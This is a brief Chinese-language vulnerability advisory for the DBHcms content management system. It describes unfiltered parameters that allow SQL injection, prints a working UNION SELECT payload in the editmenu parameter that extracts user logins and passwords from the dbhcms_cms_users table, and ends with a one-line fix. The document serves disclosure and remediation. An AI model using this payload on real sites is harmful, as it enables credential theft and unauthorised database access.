漏洞描述:DBHcms是一个面向个人和小型商业网站的开源内容管理系统,同时开发多种语言版本很好的支持搜索引擎优化。程序存在漏洞主要原因是未对提交参数进行严格过滤,导致SQL注入攻击漏洞产生。

SQL注入测试代码:
?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--

修复方案:

过滤提交参数